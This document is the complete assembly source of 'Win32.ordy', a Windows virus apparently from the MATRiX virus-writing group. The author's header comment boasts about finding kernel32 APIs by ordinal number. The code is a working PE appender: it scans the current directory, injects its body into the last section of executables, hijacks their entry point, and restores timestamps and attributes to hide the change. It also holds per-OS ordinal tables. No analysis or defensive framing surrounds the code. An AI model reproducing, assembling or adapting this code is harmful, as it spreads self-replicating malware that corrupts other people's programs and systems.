comment " Win32.ordy by mort[MATRiX] - simple direct action current dir last section PE appender - using ordinal API values to access API Well, in viriis there's mostly use some stuff to find APIs no matter of kernel32.dll type,... I use APIs' ordinal values to access APIs. API's address is counted right before it's used,... When i searched for this values in different versions of widows, i found they differ, so i included all ord values i was able to find. U find them in file in tools section. I cant test thiss virii on all windoze versions. This one seems to be good under win2k, anyway if u wanna run it under another, recheck API's count,... greetz All who helped me to create ordinal log MiCr0s0fT - i founded my CreateFileA API DF sensitive,... r there more? :))) " .486 .model flat,stdcall extrn ExitProcess : proc extrn MessageBoxA : proc filetime struc FT_dwLowDateTime dd ? FT_dwHighDateTime dd ? filetime ends fileSearch struc FileAttributes dd ? CreationTime filetime ? LastAccessTime filetime ? LastWriteTime filetime ? FileSizeHigh dd ? FileSizeLow dd ? Reserved0 dd ? Reserved1 dd ? FileName db 0260h dup(?) AlternateFileName db 13 dup(?) db 3 dup(?) fileSearch ends _vSize = ((@retAdd - @ordy) / 0200h + 1) * 0200h _DEBUG = 0 .data dd ? .code @ordy: mov eax,@retAdd - @ordy push offset @retAdd _retAddress equ $ - 4 pushad call @SEH add esp,8 mov esp,[esp] pop dword ptr fs:[0] pop eax popad ret if _DEBUG db 01000h dup(0) ;coz of debug symbols,...:( endif @SEH: push dword ptr fs:[0] mov dword ptr fs:[0],esp xor eax,eax call @findKernel @delta label mov ebp,[esp - 4] ;get delta handle mov [ebp + _kBase - @delta],eax mov ebx,eax ;get kernel values,... add eax,dword ptr [eax + 03ch] add eax,078h mov eax,[eax] add eax,ebx add eax,018h xchg eax,esi lodsd push eax lodsd add eax,ebx mov [ebp + _addBase - @delta],eax pop eax lea edi,[ebp + _ordinals - @delta - (_ordEnd - _ordStart - 2)] @nextOrdinal: add edi,(_ordEnd - _ordStart) - 2 scasw jnz @nextOrdinal mov [ebp + _ordinalBase - @delta],edi push 02000h push 040h mov eax,_GlobalAlloc call @callAPI push eax ;for GlobalFree push eax call @mask db '*.*',0 @mask: mov eax,_FindFirstFileA call @callAPI xchg eax,esi @examine: mov eax,[esp] mov al,byte ptr [eax + FileAttributes] and al,010h cmp al,010h jnz @fileFounded @nextFile: push dword ptr [esp] push esi mov eax,_FindNextFileA call @callAPI dec eax jz @examine mov eax,_GlobalFree call @callAPI xor eax,eax sub eax,[esp + 030h] ;cause exception @findKernel: add eax,[esp + 030h] and eax,0fffff000h @nextPage: sub eax,01000h cmp word ptr [eax],'ZM' jnz @nextPage ret ;------------------------------------------------------------------------ @rw: ; edi - file handle ; eax - ReadFile/WriteFile ; edx - buffer ; ecx - size pushad push 0 call @fw dd ? @fw: push ecx edx edi call @callAPI popad ret ;------------------------------------------------------------------------ @fileFounded: if _DEBUG mov eax,[esp] cmp dword ptr [eax + FileName],'SOHG' jz @oki jmp @nextFile @oki: endif mov ebx,[esp] mov eax,[ebx + FileSizeLow] cmp eax,04000h jb @nextFile mov eax,dword ptr [ebx + FileName] and dword ptr [ebx + LastWriteTime],eax jz @nextFile or dword ptr [ebx + LastWriteTime],eax mov edx,_ReadFile xchg eax,ebx add eax,01000h xchg eax,edx call @openRW push edx push edi mov eax,_CloseHandle call @callAPI pop edx cld mov edi,edx mov eax,'EPZM' scasw jnz @nextFile shr eax,010h std add edi,dword ptr [edi + 03ah] scasw scasw jnz @nextFile mov eax,[edi + 076h] shl eax,3 add eax,052h xchg eax,ebx movzx eax,word ptr [edi + 8] imul eax,028h xadd ebx,eax mov eax,_vSize add [edi + 052h],eax ;add imagesize xadd [ebx + edi + 010h],eax ;eax - old size push eax add eax,[ebx + edi + 014h] ;add phys. offset mov [ebp + _virBodyPofs - @delta],eax pop eax add eax,[ebx + edi + 0ch] xchg eax,[edi + 02ah] ;set/get entrypoint add eax,[edi + 036h] mov [ebp + _retAddress - @delta],eax ;set it,... add dword ptr [ebx + edi + 08h],01000h ;add virtual size or dword ptr [ebx + edi + 024h],0a0000020h lea eax,[ebp + @finalInfection - @delta] push eax mov eax,_WriteFile @openRW: mov ecx,01000h cld ;coz of CreateFileA DF sensitivity,...:))) call @open call @rw ret ;------------------------------------------------------------------------ @setA: push ebx push eax mov eax,_SetFileAttributesA call @callAPI ret ;----------------------------------------------------------------------- _CloseHandle = 0 ;API handles _CreateFileA = 2 _GlobalAlloc = 4 _GlobalFree = 6 _WriteFile = 8 _ReadFile = 0ah _FindFirstFileA = 0ch _FindNextFileA = 0eh _SetEndOfFile = 010h _SetFileTime = 012h _SetFileAttributesA = 014h _ordSize equ _ordEnd - _ordStart ;shl 2 _ordinals label _ordStart label _ordinals95 label dw 0682 ;APIs num dw 088h * 4 ;CloseHandle dw 09dh * 4 ;CreateFileA dw 01b5h * 4 ;GlobalAlloc dw 01bch * 4 ;GlobalFree dw 02e3h * 4 ;WriteFile dw 0242h * 4 ;ReadFile dw 0f9h * 4 ;FindFirstFileA dw 0fch * 4 ;FindNextFile dw 0281h * 4 ;SetEndOfFile dw 028bh * 4 ;SetFileTime dw 0288h * 4 ;SetFileAttributesA _ordEnd label _ordinals98 label ;(r1,SE) dw 0745 ;APIs num dw 09fh * 4 ;CloseHandle dw 0b8h * 4 ;CreateFileA dw 01e5h * 4 ;GlobalAlloc dw 01ech * 4 ;GlobalFree dw 0335h * 4 ;WriteFile dw 027dh * 4 ;ReadFile dw 011bh * 4 ;FindFirstFileA dw 0120h * 4 ;FindNextFile dw 02c5h * 4 ;SetEndOfFile dw 02cfh * 4 ;SetFileTime dw 02cch * 4 ;SetFileAttributesA _ordinalsNT label dw 02a1h ;APIs num dw 018h * 4 ;CloseHandle dw 031h * 4 ;CreateFileA dw 0155h * 4 ;GlobalAlloc dw 015ch * 4 ;GlobalFree dw 027bh * 4 ;WriteFile dw 01d6h * 4 ;ReadFile dw 082h * 4 ;FindFirstFileA dw 087h * 4 ;FindNextFile dw 0210h * 4 ;SetEndOfFile dw 021ah * 4 ;SetFileTime dw 0217h * 4 ;SetFileAttributesA _ordinals2k label dw 0337h ;APIs num dw 01eh * 4 ;CloseHandle dw 037h * 4 ;CreateFileA dw 019ch * 4 ;GlobalAlloc dw 01a3h * 4 ;GlobalFree dw 030eh * 4 ;WriteFile dw 023dh * 4 ;ReadFile dw 0a3h * 4 ;FindFirstFileA dw 0ach * 4 ;FindNextFile dw 028ch * 4 ;SetEndOfFile dw 0297h * 4 ;SetFileTime dw 0293h * 4 ;SetFileAttributesA ;------------------------------------------------------------------------ @open: ;eax - filename pushad mov eax,[esp + 028h] add eax,FileName push 0 0 3 0 1 push 080000000h or 040000000h push eax mov ebx,020h call @setA mov eax,_CreateFileA call @callAPI mov [esp],eax ;handle to edi popad ret ;------------------------------------------------------- ;eax - API handle @callAPI: pop edi add eax,012345678h _ordinalBase equ $ - 4 movzx eax,word ptr [eax] add eax,012345678h _addBase equ $ - 4 mov eax,[eax] add eax,012345678h _kBase equ $ - 4 call eax jmp edi ;---------------------------------------------------------------- @finalInfection: mov eax,012345678h _virBodyPofs equ $ - 4 sub eax,01000h push eax mov eax,_ReadFile xor ecx,ecx inc ecx @nextByte2Seek: call @rw dec dword ptr [esp] jnz @nextByte2Seek pop eax mov ecx,_vSize lea edx,[ebp + @ordy - @delta] add eax,_WriteFile call @rw push esi push edi edi mov eax,_SetEndOfFile call @callAPI mov ebx,[esp] mov eax,[esp + 0ch] add eax,LastWriteTime push eax sub eax,8 push eax sub eax,8 push eax push ebx mov eax,_SetFileTime call @callAPI mov eax,_CloseHandle call @callAPI mov ebx,[esp + 4] mov eax,[ebx + FileAttributes] xchg eax,ebx add eax,FileName call @setA pop esi ;restore search handle @fuckFile: jmp @nextFile @retAdd: push 0 call @title db '.ordy by mort[MATRiX]',0 @title: call @mess db 'hey guys, CreateFileA API is DF sensitive!!! :)))',0 @mess: push 0 call MessageBoxA call ExitProcess,0 ret end @ordy